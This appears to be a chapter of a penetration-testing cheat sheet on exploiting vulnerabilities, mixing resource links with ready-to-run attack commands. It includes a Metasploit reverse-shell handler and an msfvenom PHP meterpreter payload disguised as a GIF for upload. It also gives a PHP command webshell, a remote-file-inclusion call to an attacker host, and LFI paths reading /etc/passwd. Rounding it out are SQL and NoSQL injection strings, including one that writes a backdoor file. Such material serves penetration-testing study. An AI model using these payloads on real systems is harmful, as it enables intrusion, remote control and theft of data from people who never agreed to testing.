Chapter 3 - Exploiting Vulnerabilities

Finding Exploits

Search Exploit-DB

Kali> searchsploit windows 2003 | grep -i local

To quickly view the exploit

Kali> searchsploit -x ######.py

Search Google

Google> site:exploit-db.com exploit kernel <= 3

Search Metasploit

Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*

Search Vulners

Vulners Audit

Compiling Exploits

Compile for Windows

Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Compile for Architectures

Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)

Catching Exploits

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Breaking out of Virtualization

Breaking into the Data Centre

VENOM Vulnerability

WebSockets

Hacking with WebSockets HTML5

IPV6

Penetration testing with IPv6

How to pwn things with IPv6

HTTP

Resources

OWASP AppSec Videos

OWASP Testing Guide

Cracking the Lens: Attacking HTTPs hidden attack surface

How I hacked hundreds of companies through their helpdesk

Headers

Find what request methods the web server supports Add the following into your Burp repeater

OPTIONS * HTTP/1.1
...

Send fake IP

Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET

Webshells

PHP CMD Shell

Place in body of a PUT request and give it a file name

PUT /directory/shell.php HTTP/1.1
...

<body>
<?php
Echo exec($_GET[cmd]);
?>

Usage:

http://victim/directory/shell.php?cmd=whoami

Resources

XXE

Resources

Exploitation: XML External Entity (XXE) Injection

Exploiting a Real-World XXE Vulnerability

Exploiting XXE Vulnerabilities in file parsing

XSS

Resources

XSS Attack: Busting browsers to root

DOM Clobbering

DOM Flow - Untangling the DOM

CORS

Resources

Exploiting Misconfigured CORS

CSRF

Resources

Computerphile: Cross Site Request Forgery

Updating Anti-CSRF Tokens with BurpSuite

SSRF

Resources

What is Server side Request Forgery?

A New Era of SSRF

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)

Example

Sometimes what appears to be RFI can lead to SSRF, here are some commands to help

# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ

# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ

RCE

Resources

Node.js Remote Code Execution as a Service

Exploiting Python code execution in the web

Big List of Naughty Strings

PHP Generic Gadget Chains

Utilizing Code Re-use or ROP in PHP Exploits

Pwning PHP Mail Function for fun and RCE

Server Side Template Injection

Resources

Server Side Template Injection

Server Side Template Injection: RCE for the Modern WebApp

API

Resources

Cracking & Fixing REST APIs

LFI

Resources

Local File Inclusion Testing Techniques

Insecure PHP Functions & their Exploits (LFI/RFI)

LFI and RFI -- The Website Security Vulnerability

Local File Inclusion to Remote Code Execution

Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts

Examples

file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
    send post data
expect://whoami

Open Redirects

Resources

Open URL Redirects

RFI

Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt

Padding Oracle Attack

Resources

Automated Padding Oracle Attacks with Padbuster

Arguments

url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt

Examples

Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
                                -cookies "ENC-COOKIE"
                                -plaintext '{"user":"admin","role":"admin"}'

AWS

Resources

AWS PENETRATION TESTING PART 1. S3 BUCKETS

File Upload

Make a backdoor GIF

# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif

Upload From CLI

Kali> curl -X POST
                -F "field1=test"
                -F "file=@/home/user/evil.gif"
                http://$TARGET/upload.php
                --cookie "cookie"

E-Mail

Resources

How to Bypass E-Mail gateways using common payloads

iSCSI

Resources

An interesting route to domain admin via ISCSI

Databases

MySQL

Resources

SQL Injection

SQLMap tricks for advanced SQL injeciton

Examples

username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'

MSSQL

Resources

PenTest & Hack MSSQL

SQL Injection Cheatsheet MSSQL

MongoDB

Resources

NoSQL Map

Examples

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);

PBX

Resources

Pentesting VOIP

Introduction to Telephony and PBX

Examples

Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET

PreviousChapter 2 - Recon & Enumeration NextChapter 4 - Windows Post-Exploitation

Last updated 5 years ago

hashtagFinding Exploits

hashtagSearch Exploit-DB

hashtagSearch Google

hashtagSearch Metasploit

hashtagSearch Vulners

hashtagCompiling Exploits

hashtagCompile for Windows

hashtagCompile for Architectures

hashtagCatching Exploits

hashtagBreaking out of Virtualization

hashtagWebSockets

hashtagIPV6

hashtagHTTP

hashtagHeaders

hashtagWebshells

hashtagResources

hashtagXXE

hashtagResources

hashtagXSS

hashtagResources

hashtagCORS

hashtagCSRF

hashtagResources

hashtagSSRF

hashtagResources

hashtagExample

hashtagRCE

hashtagServer Side Template Injection

hashtagAPI

hashtagLFI

hashtagResources

hashtagExamples

hashtagOpen Redirects

hashtagResources

hashtagRFI

hashtagPadding Oracle Attack

hashtagResources

hashtagArguments

hashtagExamples

hashtagAWS

hashtagFile Upload

hashtagMake a backdoor GIF

hashtagUpload From CLI

hashtagE-Mail

hashtagiSCSI

hashtagDatabases

hashtagMySQL

hashtagResources

hashtagExamples

hashtagMSSQL

hashtagResources

hashtagMongoDB

hashtagResources

hashtagExamples

hashtagPBX

hashtagExamples

Finding Exploits

Search Exploit-DB

Search Google

Search Metasploit

Search Vulners

Compiling Exploits

Compile for Windows

Compile for Architectures

Catching Exploits

Breaking out of Virtualization

WebSockets

IPV6

HTTP

Headers

Webshells

Resources

XXE

Resources

XSS

Resources

CORS

CSRF

Resources

SSRF

Resources

Example

RCE

Server Side Template Injection

API

LFI

Resources

Examples

Open Redirects

Resources

RFI

Padding Oracle Attack

Resources

Arguments

Examples

AWS

File Upload

Make a backdoor GIF

Upload From CLI

E-Mail

iSCSI

Databases

MySQL

Resources

Examples

MSSQL

Resources

MongoDB

Resources

Examples

PBX

Examples